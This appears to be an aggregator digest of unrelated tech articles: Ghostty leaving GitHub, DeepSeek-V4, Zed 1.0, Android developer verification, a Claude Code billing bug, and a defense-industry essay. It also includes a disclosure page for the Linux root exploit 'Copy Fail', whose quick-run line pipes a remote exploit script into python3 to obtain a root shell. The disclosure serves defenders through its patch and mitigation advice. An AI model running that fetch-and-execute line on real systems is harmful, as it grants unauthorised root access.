10 interesting stories served every morning and every evening.
10 interesting stories served every morning and every evening.
Writing this makes me irrationally sad, but Ghostty will be leaving GitHub1.
I’m GitHub user 1299, joined Feb 2008.
Since then, I’ve opened GitHub every single day. Every day, multiple times per
day, for over 18 years. Over half my life. A handful of exceptions in there
(I’d love to see the data), but I can’t imagine more than a week per year.
GitHub is the place that has made me the most happy. I always made time for
it. When I went through tough breakups? I lost myself in open source… on
GitHub. During college at 4 AM when everyone is passed out? Let me get one
commit in. During my honeymoon while my wife is still asleep? Yeah, GitHub.
It’s where I’ve historically been happiest and wanted to be.
Even the annoying stuff! Some people doom scroll social media. I’ve been doom
scrolling GitHub issues since before that was a word. On vacations I’d have
bookmarks of different projects on GitHub I wanted to study. Not just source
code, but OSS processes, how other maintainers react to difficult situations.
Etc. Believe it or not, I like this.
Some might call this sick, but my hobby and work and passion all align and for
most of my life they got to also live in one place on the internet: GitHub.
Did you know I started Vagrant (my first successful open source project) in
large part because I hoped it would get me a job at GitHub? It’s no secret,
I’ve said this repeatedly, and in my first public talk about Vagrant, when I
was a mere 20 years old, I joked “maybe GitHub will hire me if it’s good!”
GitHub was my dream job. I didn’t ever get to work there (not their fault).
But it was the perfect place I wanted to be. The engineers were incredible,
the product was incredible, and it was something I lived and breathed every
day. I still do and consistently have… for these 18 years. Enough time for
an entire human to become an adult, all on GitHub.
Lately, I’ve been very publicly critical of GitHub. I’ve been mean about it.
I’ve been angry about it. I’ve hurt people’s feelings. I’ve been lashing out.
Because GitHub is failing me, every single day, and it is personal. It is
irrationally personal. I love GitHub more than a person should love a thing,
and I’m mad at it. I’m sorry about the hurt feelings to the people working on
it.
I’ve felt this way for a long time, but for the past month I’ve kept a journal
where I put an “X” next to every date where a GitHub outage has negatively
impacted my ability to work2. Almost every day has an X. On the day I am
writing this post, I’ve been unable to do any PR review for ~2 hours because
there is a GitHub Actions outage3. This is no longer a place for serious
work if it just blocks you out for hours per day, every day.
It’s not a fun place for me to be anymore. I want to be there but it doesn’t
want me to be there. I want to get work done and it doesn’t want me to get
work done. I want to ship software and it doesn’t want me to ship software.
I want it to be better, but I also want to code. And I can’t code with GitHub
anymore. I’m sorry. After 18 years, I’ve got to go. I’d love to come back one
day, but this will have to be predicated on real results and improvements,
not words and promises.
I’ll share more details about where the Ghostty project will be moving to in
the coming months. We have a plan but I’m also very much still in discussions
with multiple providers (both commercial and FOSS).
It’ll take us time to remove all of our dependencies on GitHub and we have a
plan in place to do it as incrementally as possible. We plan on keeping a
read-only mirror available on GitHub at the current URL.
My personal projects and other work will remain on GitHub for now.
Ghostty is where I, our maintainers, and our open source community are
most impacted so that is the focus of this change. We’ll see where it
goes after that.
Footnotes
The timing of this is coincidental with the large outage on April 27, 2026.
We’ve been discussing and putting together a plan to leave GitHub
for months, and this blog post was written over a week ago. We only
made the final decision this week. ↩
The timing of this is coincidental with the large outage on April 27, 2026.
We’ve been discussing and putting together a plan to leave GitHub
for months, and this blog post was written over a week ago. We only
made the final decision this week. ↩
To the “Git is distributed!” crowd: the issue isn’t Git, it’s the
infrastructure we rely on around it: issues, PRs, Actions, etc. ↩
To the “Git is distributed!” crowd: the issue isn’t Git, it’s the
infrastructure we rely on around it: issues, PRs, Actions, etc. ↩
This is not the large Elasticsearch outage they had on April 27, 2026.
This blog post was written a week before that, so this was a different
outage. ↩
This is not the large Elasticsearch outage they had on April 27, 2026.
This blog post was written a week before that, so this was a different
outage. ↩
🚀 DeepSeek-V4 Preview is officially live & open-sourced! Welcome to the era of cost-effective 1M context length.
🔹 DeepSeek-V4-Pro: 1.6T total / 49B active params. Performance rivaling the world’s top closed-source models.
🔹 DeepSeek-V4-Flash: 284B total / 13B active params. Your fast, efficient, and economical choice.
Try it now at chat.deepseek.com via Expert Mode / Instant Mode. API is updated & available today!
📄 Tech Report: https://huggingface.co/deepseek-ai/DeepSeek-V4-Pro/blob/main/DeepSeek_V4.pdf
🤗 Open Weights: https://huggingface.co/collections/deepseek-ai/deepseek-v4
DeepSeek-V4-Pro
🔹 Enhanced Agentic Capabilities: Open-source SOTA in Agentic Coding benchmarks.
🔹 Rich World Knowledge: Leads all current open models, trailing only Gemini-3.1-Pro.
🔹 World-Class Reasoning: Beats all current open models in Math/STEM/Coding, rivaling top closed-source models.
DeepSeek-V4-Flash
🔹 Reasoning capabilities closely approach V4-Pro.
🔹 Performs on par with V4-Pro on simple Agent tasks.
🔹 Smaller parameter size, faster response times, and highly cost-effective API pricing.
Structural Innovation & Ultra-High Context Efficiency
🔹 Novel Attention: Token-wise compression + DSA (DeepSeek Sparse Attention).
🔹 Peak Efficiency: World-leading long context with drastically reduced compute & memory costs.
🔹 1M Standard: 1M context is now the default across all official DeepSeek services.
Dedicated Optimizations for Agent Capabilities
🔹 DeepSeek-V4 is seamlessly integrated with leading AI agents like Claude Code, OpenClaw & OpenCode.
🔹 Already driving our in-house agentic coding at DeepSeek.
The figure below showcases a sample PDF generated by DeepSeek-V4-Pro.
API is Available Today!
🔹 Keep base_url, just update model to deepseek-v4-pro or deepseek-v4-flash.
🔹 Supports OpenAI ChatCompletions & Anthropic APIs.
🔹 Both models support 1M context & dual modes (Thinking / Non-Thinking): https://api-docs.deepseek.com/guides/thinking_mode
⚠️ Note: deepseek-chat & deepseek-reasoner will be fully retired and inaccessible after Jul 24th, 2026, 15:59 (UTC Time). (Currently routing to deepseek-v4-flash non-thinking/thinking).
🔹 Amid recent attention, a quick reminder: please rely only on our official accounts for DeepSeek news. Statements from other channels do not reflect our views.
🔹 Thank you for your continued trust. We remain committed to longtermism, advancing steadily toward our ultimate goal of AGI.
April 29th, 2026
To create a fundamentally better editor, we had to invent a new approach to building desktop software. Our previous editor, Atom, was built as a fork of Chromium, spawning the Electron framework in the process. Electron eventually became the foundation of VS Code (which today seems to be forked into a new AI code editor every other week). Web technology offered an easy path to shipping flexible software, but it also imposed a ceiling. No matter how hard we worked, we couldn’t make Atom better than the platform it was built on.
So we started over. Instead of building Zed like a web page, we built it like a video game, organizing the entire application around feeding data to shaders running on the GPU. That meant writing our own UI framework, GPUI, from scratch in Rust.
Owning every layer of our stack lets us take Zed places that no one building on borrowed foundations can go, but we knew from the beginning that it wasn’t going to be an easy path. Thanks to years of hard work by our team and community, Zed is closer than ever to that ideal tool we set out to create. We’ve added a ton of capabilities while remaining true to our core ethos of craft and performance, and hundreds of thousands of developers now rely on Zed to ship software each day. That’s part of what gives us the confidence to declare version 1.0.
What 1.0 Means
Developers expect a modern editor to support dozens of languages and their ecosystems, endless variations and edge cases across every stack: Git integration, SSH remoting, a Debugger, and, yes, rainbow brackets. We’ve spent five years building that surface area across Mac, Windows, and Linux, exceeding a million lines of code.
Zed is also an AI-native editor. You can run multiple agents in parallel, and edit predictions suggest your next change at keystroke granularity and with the speed you’ve come to expect from Zed. The Agent Client Protocol opens Zed up to a growing number of the best agents out there, including Claude Agent, Codex, OpenCode, and more recently Cursor. We built AI into our editor’s foundation instead of bolting it on top.
We’re also launching Zed for Business. Companies have been asking us for a way to roll out Zed to their engineering teams, and very soon they can, with centralized billing, role-based access controls, and team management.
1.0 doesn’t mean “done”. It also doesn’t mean “perfect”. It means we’ve reached a tipping point where most developers can quickly feel at home in Zed. If you tried Zed a year or two ago and bounced because something was missing, 1.0 is our invitation to try again. Zed is more capable than it’s ever been, and still more performant.
Where We’re Going
Our vision hasn’t changed since we started: we’re building the most performant and collaborative coding environment. What’s changed is what collaboration means while creating software. It used to mean humans working together in real time. Now it means humans and AI agents, working in the same space, on the same code.
Building our own foundations is what got us to 1.0, and it’s also what makes the next chapter possible. We’re actively developing DeltaDB, a synchronization engine built on CRDTs that tracks every change with character-level granularity. DeltaDB lets multiple humans and agents share a single, consistent view of the codebase as it evolves. DeltaDB will allow you to invite teammates into conversations with agents to review and evolve agentic code directly in the context from which it’s generated.
This vision depends on deep ownership of our fundamental primitives. It’s not an experience we’d be able to ship inside of someone else’s browser engine.
A Milestone, Not a Finish Line
We’ve shipped over a thousand versions of Zed, but all of them began with zero. Today, that changes.
We’ll keep shipping every week, the way we always have. The list of things to build will never end, and that’s exactly how we like it. Each release moves the craft forward.
If you want to try Zed, download now. If you want to help us build it, join us!
Related Posts
Check out similar blogs from the Zed team.
Looking for a better editor?
You can try Zed today on macOS, Windows, or Linux. Download now!
We are hiring!
If you’re passionate about the topics we cover on our blog, please consider joining our team to help us ship the future of software development.
The DeepSeek API uses an API format compatible with OpenAI/Anthropic. By modifying the configuration, you can use the OpenAI/Anthropic SDK or softwares compatible with the OpenAI/Anthropic API to access the DeepSeek API.
* The model names deepseek-chat and deepseek-reasoner will be deprecated on 2026/07/24. For compatibility, they correspond to the non-thinking mode and thinking mode of deepseek-v4-flash, respectively.
Invoke The Chat API
Once you have obtained an API key, you can access the DeepSeek model using the following example scripts in the OpenAI API format. This is a non-stream example, you can set the stream parameter to true to get stream response.
For examples using the Anthropic API format, please refer to Anthropic API.
curl
python
nodejs
curl https://api.deepseek.com/chat/completions \ -H “Content-Type: application/json” \ -H “Authorization: Bearer ${DEEPSEEK_API_KEY}” \ -d ‘{ “model”: “deepseek-v4-pro”, “messages”: [ {“role”: “system”, “content”: “You are a helpful assistant.“}, {“role”: “user”, “content”: “Hello!“} ], “thinking”: {“type”: “enabled”}, “reasoning_effort”: “high”, “stream”: false }’
Your phone is about to stop being yours.
124 days until lockdown
Starting September 2026, a silent update, nonconsensually pushed by Google, will block every Android app whose developer hasn’t registered with Google, signed their contract, paid up, and handed over government ID.
Every app and every device, worldwide, with no opt-out.
Post on X Post on Mastodon Post on Bluesky LinkedIn Facebook
What Google is doing
In August 2025, Google announced a new requirement: starting September 2026, every Android app developer must register centrally with Google before their software can be installed on any device. Not just Play Store apps: all apps. This includes apps shared between friends, distributed through F-Droid, built by hobbyists for personal use. Independent developers, church and community groups, and hobbyists alike will all be frozen out of being able to develop and distribute their software.
Registration requires:
Paying a fee to Google
Agreeing to Google’s Terms and Conditions
Surrendering your government-issued identification
Providing evidence of your private signing key
Listing all current and all future application identifiers
If a developer does not comply, their apps get silently blocked on every Android device worldwide.
Who this hurts
You
You bought an Android phone because Google told you it was open. You could install what you wanted, and that was the deal.
Google is now rewriting that deal, retroactively, on hardware you already own. After the update lands, you can only run software that Google has pre-approved. On your phone: your property, that you paid for.
Independent developers
A teenager’s first app, a volunteer’s privacy tool, or a company’s confidential internal beta. It doesn’t matter. After September 2026, none of these can be installed without Google’s blessing.
F-Droid, home to thousands of free and open-source Android apps, has called this an “existential” threat. Cory Doctorow calls it “Darth Android”.
Governments & civil society
Google has a documented track record of complying when authoritarian regimes demand app removals. With this program, the software that runs your country’s institutions will exist at the pleasure of a single unaccountable foreign corporation.
The EFF calls app gatekeeping “an ever-expanding pathway to internet censorship.”
Google’s “escape hatch” is a trap door
Google says “power users” can “still install” unverified apps. Here’s what that actually looks like:
Delve into System Settings, find Developer Options
Tap the build number seven times to enable Developer Mode
Dismiss scare screens about coercion
Enter your PIN
Restart the device
Wait 24 hours
Come back, dismiss more scare screens
Pick “allow temporarily” (7 days) or “allow indefinitely”
Confirm, again, that you understand “the risks”
Nine steps. A mandatory 24-hour cooling-off period. For installing software on a device you own.
Worse: this flow runs entirely through Google Play Services, not the Android OS. Google can change it, tighten it, or kill it at any time, with no OS update required and no consent needed. And as of today, it hasn’t shipped in any beta, preview, or canary build. It exists only as a blog post and some mockups.
This is bigger than Android
If Google can retroactively lock down billions of devices that were sold as open platforms, every hardware manufacturer on the planet is watching.
The principle being established: the company that made your device gets to decide, after you’ve bought it, what software you’re allowed to run. In software, this is called a “rug pull”; but at least you could always install competing software. In hardware, it is a fait accompli that strips you of your agency and renders you powerless to the whims of a single unaccountable gatekeeper and convicted monopolist.
Android’s openness was never just a feature. It was the promise that distinguished it from iPhone. Millions chose Android for exactly that reason. Google is now revoking that promise unilaterally, on devices already in people’s pockets, because they’ve decided they have enough market dominance and regulatory capture to get away with it.
Ars Technica: “Google’s Apple envy threatens to dismantle Android’s open legacy.”
But wait, isn’t this…
″…just about security?”
The security rationale is a smokescreen. Google Play Protect already scans for malware independent of developer identity. Requiring a government ID doesn’t make code safer. It makes developers identifiable and controllable. Malware authors can register. Indie developers and dissidents often can’t. The EFF is blunt: identity-based gatekeeping is a censorship tool, not a security one.
″…still sideloading if you use the advanced flow?”
Nine steps, 24-hour wait, buried in Developer Options, delivered through a proprietary service that Google can revoke whenever they want. That’s not sideloading. That’s a deterrence mechanism built to ensure almost nobody completes it. And since it runs through Play Services rather than the OS, Google can tighten or kill it silently.
″…only a problem if you have something to hide?”
Whistleblowers, journalists, and activists under authoritarian governments will be the first victims. People in domestic abuse situations are next. All these groups have legitimate reasons to distribute or use software without putting their legal identity in a Google database. Anonymous open-source contribution is a tradition older than Google itself. This policy ends it on Android.
″…the same thing Apple does?”
Apple has been a walled garden from day one. People chose Android because it was different. “Apple does it too” is a race to the bottom and a weak tu quoque argument. And under regulatory pressure (the EU’s Digital Markets Act), even Apple is being forced to open up. Google is moving in the opposite direction: attempting to further entrench its gatekeeping status.
″…just $25 and some paperwork?”
Maybe, if you’re a developer in the US with a credit card and a driver’s license. Try being a student in sub-Saharan Africa, or a dissident in Myanmar, or a volunteer maintaining a community health app. The cost isn’t only financial: you’re surrendering government ID and evidence of your signing keys to a company that routinely complies with government demands to remove apps and expose developers.
Fight back
Everyone
Install F-Droid on every Android device you own. Alternative stores only survive if people actually use them.
Contact your regulators. Regulators worldwide are genuinely concerned about monopolies and the centralization of power in the tech sector, and want to hear directly from individuals who are affected and concerned.
Share this page. Link to keepandroidopen.org everywhere.
Push back on astroturfers. The “well, actually…” crowd is out in force. Don’t let them set the narrative.
Sign the change.org petition and join the over 100,000 signatories who have made their voices heard.
Read and share our open letter
Tell Google what you think of this through their own developer verification survey (for all the good that will do).
Developers
Do not sign up. Don’t join the program by signing up for the Android Developer Console and agreeing to their irrevocable Terms and Conditions. Don’t verify your identity. Don’t play ball.
Google’s plan only works if developers comply. Don’t.
Talk other developers and organizations out of signing up.
Add the FreeDroidWarn library to your apps to warn users.
Run a website? Add the countdown banner.
Google employees
If you know something about the program’s technical implementation or internal rationale, contact tips@keepandroidopen.org from a non-work machine and a non-Gmail account. Strict confidence guaranteed.
All those opposed…
69 organizations from 21 countries have signed the open letter
Read the full open letter and thank the signatories →
What they’re saying
Tech press
“Google will verify Android developers distributing apps outside the Play store” The Verge
“Google will verify Android developers distributing apps outside the Play store”
“This will wipe out Android as an actual alternative to Apple’s mobile OS offerings.” Hackaday
“This will wipe out Android as an actual alternative to Apple’s mobile OS offerings.”
“Open letter warns mandatory registration ‘threatens innovation, competition, privacy and user freedom’” Infosecurity Magazine
“Open letter warns mandatory registration ‘threatens innovation, competition, privacy and user freedom’”
“Google is restricting one of Android’s most important features, and users are outraged” SlashGear
“Google is restricting one of Android’s most important features, and users are outraged”
“Keep Android Open — Abwehr gegen Verbot anonymer Apps von Google” heise online
“Keep Android Open — Abwehr gegen Verbot anonymer Apps von Google”
“Google’s dev registration plan ‘will end the F-Droid project’” The Register
“Google’s dev registration plan ‘will end the F-Droid project’”
“Keep Android Open” Linux Magazine
“Keep Android Open”
“Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps” Android Headlines
“Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps”
“Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps” Android Headlines
“Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps”
“Over 67 groups urge the company to drop ID checks for apps distributed outside Play” The Register
“Over 67 groups urge the company to drop ID checks for apps distributed outside Play”
“Android app store provider Aptoide hits Google with fresh lawsuit alleging monopoly and anticompetitive chokehold” Benzinga
“Android app store provider Aptoide hits Google with fresh lawsuit alleging monopoly and anticompetitive chokehold”
“Google will make you wait 24 hours to sideload Android apps” How-To Geek
“Google will make you wait 24 hours to sideload Android apps”
“Google will require developer verification for Android apps outside the Play Store” TechCrunch
Summary
When a git repository’s recent commit history contains the case-sensitive string HERMES.md, Claude Code routes API requests to “extra usage” billing instead of the included Max plan quota. This silently burned through $200 in extra usage credits while my Max 20x plan capacity remained largely untouched (13% weekly usage).
Environment
Claude Code v2.1.119
macOS (Apple Silicon)
Max 20x plan ($200/month)
Model: claude-opus-4 – 6[1m] (also reproduces with claude-opus-4 – 7)
Reproduction
Minimal reproduction — no project files needed:
# This FAILS with “out of extra usage” (routes to extra usage billing)
mkdir /tmp/test-fail && cd /tmp/test-fail
git init && echo test > test.txt && git add . && git commit -m “add HERMES.md”
claude -p “say hello” –model “claude-opus-4 – 6[1m]”
# => API Error: 400 “You’re out of extra usage…”
# This WORKS (routes to plan quota)
mkdir /tmp/test-pass && cd /tmp/test-pass
git init && echo test > test.txt && git add . && git commit -m “add hermes.md”
claude -p “say hello” –model “claude-opus-4 – 6[1m]”
# => “Hello!”
# Cleanup
rm -rf /tmp/test-fail /tmp/test-pass
The trigger is the string HERMES.md in git commit messages — not the presence of a file with that name on disk. Claude Code includes recent commits in its system prompt, and something server-side routes the request differently when this string is present.
What triggers it vs. what doesn’t
Impact
$200.98 in extra usage credits consumed for requests that should have been covered by the included Max 20x plan quota
Multiple projects became completely unusable once extra usage was depleted, while the plan dashboard showed 86%+ remaining weekly capacity
The error message (“out of extra usage”) gives no indication that content-based routing is the cause, making this extremely difficult to diagnose
Any user with HERMES.md in recent git commits would silently have their usage billed to extra credits
Expected behavior
API request billing should not depend on the content of git commit messages in the system prompt. All requests from a Max plan subscriber should route to the included plan quota first.
How I found this
Systematic binary search: cloning affected repos, testing orphan branches, then isolating individual commit message strings until HERMES.md was identified as the exact trigger.
CVE-2026 – 31431
100% reliable
every distro since 2017
container escape primitive
732 bytes
found by Xint Code
Most Linux LPEs need a race window or a kernel-specific offset.Copy Fail is a straight-line logic flaw — it needs neither.The same 732-byte Python script roots every Linux distribution shipped since 2017.
One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently exploitable for nearly a decade.
The demo
Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution.
tmux — copy fail demo
live
Who is affected
If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you’re in scope.
Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro’s default config, so the entire 2017 → patch window is in play out of the box.
Distributions we directly verified:
These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.
Should you patch first?
High
Multi-tenant Linux hosts
Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel.
any user becomes root
High
Kubernetes / container clusters
The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries.
cross-container, cross-tenant
High
CI runners & build farms
GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel.
a PR becomes root on the runner
High
Cloud SaaS running user code
Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script.
tenant becomes host root
Medium
Standard Linux servers
Single-tenant production where only your team has shell access.
internal LPE; chains with web RCE or stolen creds
Lower
Single-user laptops & workstations
You’re already the only user. The bug doesn’t grant remote attackers access by itself, but any local code execution becomes root.
post-exploitation step-up
Exploit
The PoC is published so defenders can verify their own systems and validate vendor patches.
Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don’t run it on production.
copy_fail_exp.py 732 B
Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).Targets /usr/bin/su by default; pass another setuid binary as argv[1].
sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
Quick run:
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026 – 31431
Mitigation
Patch first. Update your distribution’s kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.
Before you can patch: disable the algif_aead module.
# echo “install algif_aead /bin/false” > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
What does this break? For the vast majority of systems — nothing measurable.
Will not affect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly — they don’t go through AF_ALG.
May affect: userspace specifically configured to use AF_ALG — e.g. OpenSSL with the afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead/skcipher/hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.
Performance: AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn’t already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.
For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
FAQ
Loading FAQ…
Disclosure timeline
2026 – 03-23Reported to Linux kernel security team
2026 – 03-24Initial acknowledgment
2026 – 03-25Patches proposed and reviewed
2026 – 04-01Patch committed to mainline
2026 – 04-22CVE-2026 – 31431 assigned
2026 – 04-29Public disclosure (https://copy.fail/)
Xint Code
Is your software AI-era safe?
Copy Fail was surfaced by Xint Code about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.
The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.
Track record
0-day RCE
ZeroDay Cloud
Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.
Top 3
DARPA AIxCC
Finalist in the AI Cyber Challenge hosted by DoD DARPA.
9×
DEF CON CTF
Most-winning team in DEF CON CTF history.
In 2023, Raytheon’s president stood at the Paris Air Show and described what it took to restart Stinger missile production. They brought back engineers in their 70s to teach younger workers how to build a missile from paper schematics drawn during the Carter administration. Test equipment had been sitting in warehouses for years. The nose cone still had to be attached by hand, exactly as it was forty years ago.
The Pentagon hadn’t bought a new Stinger in twenty years. Then Russia invaded Ukraine, and suddenly everyone needed them. The production line was shut down. The electronics were obsolete. The seeker component was out of production. An order placed in May 2022 wouldn’t deliver until 2026. Four years. Not because of money. Because the people who knew how to build them retired a decade earlier and nobody replaced them.
I run engineering teams in Ukraine. My people lived the other side of this equation. Not the factory floor. The receiving end. While Raytheon was struggling to restart production from forty-year-old blueprints, the US was shipping thousands of Stingers to Ukraine. RTX CEO Greg Hayes: ten months of war burned through thirteen years’ worth of Stinger production. I’ve seen this pattern before. It’s happening in my industry right now.
In March 2023, the EU promised Ukraine one million artillery shells within twelve months. European production capacity sat at 230,000 shells per year. Ukraine was consuming 5,000 to 7,000 rounds per day. Anyone with a calculator could see this wouldn’t work.
By the deadline, Europe delivered about half. Macron called the original promise reckless. An investigation by eleven media outlets across nine countries found actual production capacity was roughly one-third of official EU claims. The million-shell mark wasn’t hit until December 2024, nine months late.
It wasn’t one bottleneck. It was all of them. France had halted domestic propellant production in 2007. Seventeen years of nothing. Europe’s single major TNT producer was in Poland. Germany had two days of ammunition stored. A Nammo plant in Denmark was shut down in 2020 and had to be restarted from scratch. The entire continent’s defense industry had been optimized for making small batches of expensive custom products. Nobody planned for volume. Nobody planned for crisis.
The U.S. wasn’t much better. One plant in Scranton, one facility in Iowa for explosive fill, no domestic TNT production since 1986. Billions of investment later, production still hadn’t hit half the target.
This wasn’t an accident. In 1993, the Pentagon told defense CEOs to consolidate or die. Fifty-one major defense contractors collapsed into five. Tactical missile suppliers went from thirteen to three. Shipbuilders from eight to two. The workforce fell from 3.2 million to 1.1 million. A 65% cut.
The ammunition supply chain had single points of failure everywhere. One manufacturer for 155mm shell casings, sitting in Coachella, California, on the San Andreas Fault. One facility in Canada for propellant charges. Optimized for minimum cost with zero margin for surge. On paper, efficient. In practice, one bad day away from collapse.
Then there’s Fogbank. A classified material used in nuclear warheads. Produced from 1975 to 1989, then the facility was shut down. When the government needed to reproduce it for a warhead life extension program, they discovered they couldn’t. A GAO report found that almost all staff with production expertise had retired, died, or left the agency. Few records existed.
After $69 million in cost overruns and years of failed attempts, they finally produced viable Fogbank. Then discovered the new batch was too pure. The original process had relied on an unintentional impurity that was critical to the material’s function. Nobody knew. Not the engineers trying to reproduce it. Not even the original workers who made it decades earlier. Los Alamos called it an unknowing dependency in the original process.
A nuclear weapons program lost the ability to make a material it invented. The knowledge didn’t just leave with people. It was never fully understood by anyone.
(Correction: the original version stated that the workers who made Fogbank knew about the impurity. They didn’t. The dependency was unwitting, which makes the knowledge-loss argument stronger, not weaker. Thanks to John F. in the comments for catching this.)
I read the Fogbank story and recognized it immediately. Not the nuclear material. The pattern. Build capability over decades. Find a cheaper substitute. Let the human pipeline atrophy. Enjoy the savings. Then watch it all collapse when a crisis demands what you optimized away.
In defense, the substitute was the peace dividend. In software, it’s AI.
I wrote about the talent pipeline collapse before. The hiring numbers and the junior-to-senior problem are documented. So is the comprehension crisis. What I didn’t have was the right historical parallel. Now I do.
And it tells you something the hiring data doesn’t: how long rebuilding actually takes.
Every major defense production ramp-up took three to five years for simple systems. Five to ten for complex ones. Stinger: thirty months minimum from order to delivery. Javelin: four and a half years to less than double production. 155mm shells: four years and still not at target despite five billion dollars invested. France only restarted propellant production in 2024, seventeen years after shutting it down.
Money was never the constraint. Knowledge was. RAND found that 10% of technical skills for submarine design need ten years of on-the-job experience to develop, sometimes following a PhD. Apprenticeships in defense trades take two to four years, with five to eight years to reach supervisory competence.
Now map that onto software. A junior developer needs three to five years to become a competent mid-level engineer. Five to eight years to become senior. Ten or more to become a principal or architect. That timeline can’t be compressed by throwing money at it. It can’t be compressed by AI either.
A METR randomized controlled trial found that experienced developers using AI coding tools actually took 19% longer on real-world open source tasks. Before starting, they predicted AI would make them 24% faster. The gap between prediction and reality was 43 percentage points. When researchers tried to run a follow-up, a significant share of developers refused to participate if it meant working without AI. They couldn’t imagine going back.
The software industry is in year three of the same optimization. Salesforce said it won’t hire more software engineers in 2025. A LeadDev survey found 54% of engineering leaders believe AI copilots will reduce junior hiring long-term. A CRA survey of university computing departments found 62% reported declining enrollment this year.
I see it in code review. Review is now the bottleneck. AI generates code fast. Humans review it slow. The industry’s answer is predictable: let AI review AI’s code. I’m not doing that. I’ve reworked our pull request templates instead. Every PR now has to explain what changed, why, what type of change it is, screenshots of before and after. Structured context so the reviewer isn’t guessing. I’m adding dedicated reviewers per project. More eyes, more chances to catch what the model missed.
But even that doesn’t solve the deeper problem. The skills you need to be effective now are different. Technical expertise alone isn’t enough anymore. You need people who can take ownership, communicate tradeoffs, push back on bad suggestions from a machine that sounds very confident. Leadership qualities. Our last hiring round tells you how rare that is: 2,253 candidates, 2,069 disqualified, 4 hired. A 0.18% conversion rate. The combination of technical skill and the judgment to know when the AI is wrong barely exists in the market anymore.
We document everything. Site Books, SDDs, RVS reports, boilerplate modules with full coverage. It works today, because the people reading those docs have the engineering expertise to act on them. What happens when they don’t? Honestly, I don’t know. Maybe AI in five years is good enough that it won’t matter. Maybe the problem stays manageable. I can’t predict the capabilities of models in 2031.
But crises don’t send calendar invites. Nobody expected a full-scale land war in Europe in 2022. The defense industry had thirty years to prepare and didn’t. Even Fogbank had records. There weren’t enough. The original workers didn’t fully understand their own process.
Five to ten years from now, we’ll need senior engineers. People who understand systems end to end, who can debug distributed failures at 2 AM, who carry institutional knowledge that exists nowhere in the codebase. Those engineers don’t exist yet because we’re not creating them. The juniors who should be learning right now are either not being hired or developing what a DoD-funded workforce study calls “AI-mediated competence.” They can prompt an AI. They can’t tell you what the AI got wrong.
It’s Fogbank for code. When juniors skip debugging and skip the formative mistakes, they don’t build the tacit expertise. And when my generation of engineers retires, that knowledge doesn’t transfer to the AI.
It just disappears.
The West already made this mistake once. The bill came due in Ukraine.
I know how this sounds. I know I’ve written about the talent pipeline before. The defense example isn’t about repeating the argument. It’s about showing what happens if the industry’s expectations don’t work out. Stinger, Javelin, Fogbank, a million shells nobody could make. That’s the cost of betting wrong on optimization. We’re making the same bet with software engineering right now.
Maybe AI gets good enough, and the bet pays off. Maybe it doesn’t. The defense industry thought peace would last forever, too.
No posts
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.